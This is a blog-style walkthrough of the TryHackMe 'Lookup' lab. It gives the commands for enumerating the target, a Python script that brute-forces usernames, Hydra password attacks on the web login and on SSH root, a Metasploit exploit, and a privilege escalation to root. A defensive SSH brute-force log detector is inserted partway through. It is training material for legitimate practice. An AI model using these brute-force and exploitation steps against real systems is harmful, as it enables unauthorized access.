Lookup — TryHackMe by rradhasan

R-Rad Hasan
5 min read · Jan 8, 2025


About The Lab

Room Name: Lookup
Room Link: https://tryhackme.com/r/room/lookup

This lab falls under the “easy” category, making it an excellent starting point for beginners. It offers valuable learning opportunities and introduces foundational concepts, which I believe beginners will enjoy exploring.

What I Learned From this Challenge

Through this lab, I learned how to use Hydra effectively and how to create a brute-force program using Python. Additionally, I gained a better understanding of when to utilize these tools for different scenarios.

Prerequisites

Although this lab is categorized as “easy,” it requires a foundational knowledge of the following topics and tools:

  • Nmap (for service enumeration)
  • Fuzzing (e.g., using FFUF)
  • Metasploit Framework
  • Shell Commands
  • Hydra
  • Python Programming (for scripting and automation)
  • Linux Command Line (basic proficiency)

If you are familiar with these areas, you will find this lab manageable and enjoyable.

Task Completion Section

Initial Setup

  1. Start the machine provided by the lab.
  2. Copy the IP address of the target machine and add it to your /etc/hosts file with the domain lookup.thm (ensure you open the file with sudo permissions). This step will allow you to resolve the domain correctly.

[User Flag]

Step 1: Service Enumeration

Use Nmap to identify services and versions running on the target machine. Run the following command:

nmap -sV -A lookup.thm

Step 2: Subdomain Enumeration

After identifying the services, use FFUF to enumerate subdomains:

ffuf -u http://FUZZ.lookup.thm -w /path/to/wordlist

Once a subdomain is identified, update your /etc/hosts file to include the subdomain. Navigate to the subdomain, where you will find a login page.

Step 3: Username Enumeration

Since no credentials are available, brute force the username using a custom Python script:

import requests

# Login endpoint and username wordlist
url = 'http://lookup.thm/login.php'
usernamesFile = '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt'

# Stream the wordlist line by line instead of loading it all into memory
with open(usernamesFile, 'r', errors='ignore') as file:
    for line in file:
        username = line.strip()
        if not username:
            continue
        response = requests.post(url, data={'username': username, 'password': 'test'}, timeout=10)
        # The page answers "Wrong password" only when the username exists
        if "Wrong password" in response.text:
            print(f"Valid username found: {username}")
            break

Run the script and obtain the valid username.

Step 4: Password Brute Forcing

With the identified username, use Hydra to brute force the password:

hydra -l <username> -P /path/to/password-list lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"

Step 5: Gaining Access

Log in with the identified credentials. Once logged in, navigate the web application, and locate a “Settings” option. Clicking this will reveal the application version.

Step 6: Exploitation

Using the application version, search for available exploits using searchsploit:

searchsploit <application-version>

Load the identified exploit in Metasploit:

msfconsole
use <exploit-path>
set RHOSTS lookup.thm
set USERNAME <username>
set PASSWORD <password>
exploit

Step 7: Privilege Escalation

Once you gain a Meterpreter session, switch to a shell:

shell

Use the find command to locate files owned by a given user:

find / -type f -user <username> 2>/dev/null

Navigate to the identified file or directory, and extract sensitive information, such as credentials or password lists. Save the extracted password list to a file.

Step 8: Hydra for Privilege Escalation

Use Hydra again to brute force root credentials:

hydra -l root -P /path/to/password-list ssh://lookup.thm
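
What this step looks like in the target's logs, as an added example that is not part of the original write-up: a sliding-window counter over sshd "Failed password" lines that flags a source making many attempts against one account. The log lines are constructed (documentation IP ranges), and the threshold, window and year parameter are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the standard OpenSSH failure line, e.g.
# "Jan  8 10:00:01 host sshd[123]: Failed password for root from 203.0.113.5 port 4242 ssh2"
FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2025):
    """Return sorted (source_ip, user) pairs with >= threshold failures inside window."""
    recent = defaultdict(deque)  # (ip, user) -> timestamps still inside the window
    flagged = set()
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        stamp, user, ip = m.groups()
        # syslog timestamps omit the year, so it is supplied as a parameter
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        q = recent[(ip, user)]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged.add((ip, user))
    return sorted(flagged)

# Constructed sample log (not taken from the room)
SAMPLE_LOG = [
    f"Jan  8 10:00:{s:02d} lookup sshd[{900 + s}]: Failed password for root "
    f"from 203.0.113.5 port {40000 + s} ssh2"
    for s in range(0, 12, 2)
] + [
    "Jan  8 10:01:10 lookup sshd[950]: Failed password for invalid user admin from 198.51.100.7 port 51000 ssh2",
    "Jan  8 10:03:00 lookup sshd[951]: Failed password for root from 198.51.100.7 port 51001 ssh2",
    "Jan  8 10:05:00 lookup sshd[952]: Accepted password for root from 198.51.100.7 port 51002 ssh2",
]

if __name__ == "__main__":
    for ip, user in detect_bruteforce(SAMPLE_LOG):
        print(f"possible brute force: {ip} -> {user}")
```

Setting `PermitRootLogin prohibit-password` (or `no`) in sshd_config removes password guessing against root altogether, which is the stronger fix; the detector covers accounts that must keep password login.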

Step 9: Root Access

Once the root credentials are identified, log in via SSH. If an id_rsa file is available, save it, set appropriate permissions, and use it for login:

chmod 600 id_rsa
ssh -i id_rsa root@lookup.thm

Congratulations! You now have root access. Collect the flag from the root directory.

How Was My Experience

Initially, I assumed this lab would be straightforward, but it turned out to be more challenging than expected. Despite being labeled “easy,” the lab tested my skills in multiple areas, including scripting, enumeration, and exploitation. The blend of tasks pushed me out of my comfort zone and reinforced my understanding of essential tools and techniques. Overall, this lab was both enjoyable and educational, and I highly recommend it to anyone looking to strengthen their foundational skills.

Conclusion

The Lookup lab on TryHackMe proved to be a fascinating and enriching experience. While initially categorized as “easy,” it presented challenges that required leveraging multiple skills, including subdomain enumeration, brute forcing, scripting, and exploitation using tools like Hydra and Metasploit. It also provided an excellent opportunity to practice using Python for brute force enumeration, enhancing programming and automation skills.

This lab emphasized the importance of understanding services and their vulnerabilities, demonstrating how to utilize publicly available exploit databases effectively. The journey from discovery to exploitation and privilege escalation offered practical insights into real-world penetration testing workflows.

Overall, the lab was both challenging and rewarding, offering valuable lessons in persistence, creativity, and technical skills. I highly recommend this lab to beginners and intermediates looking to solidify their foundations in enumeration, exploitation, and privilege escalation.
